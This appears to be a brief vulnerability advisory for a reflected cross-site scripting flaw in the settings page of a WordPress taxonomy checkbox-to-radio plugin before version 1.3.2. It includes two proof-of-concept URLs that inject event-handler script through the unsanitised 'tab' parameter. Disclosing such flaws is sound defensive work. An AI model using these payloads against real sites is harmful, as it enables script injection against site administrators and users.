The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue
https://example.com/wp-admin/options-general.php?page=moove-taxonomy-settings&tab;=" onMouseOver="alert(1); https://example.com/wp-admin/options-general.php?page=moove-taxonomy-settings&tab;=“+style%3D"animation-name%3Aspinner”+onanimationstart%3D"alert(%2FXSS%2F)
CPE | Name | Operator | Version |
---|---|---|---|
select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons | lt | 1.3.2 |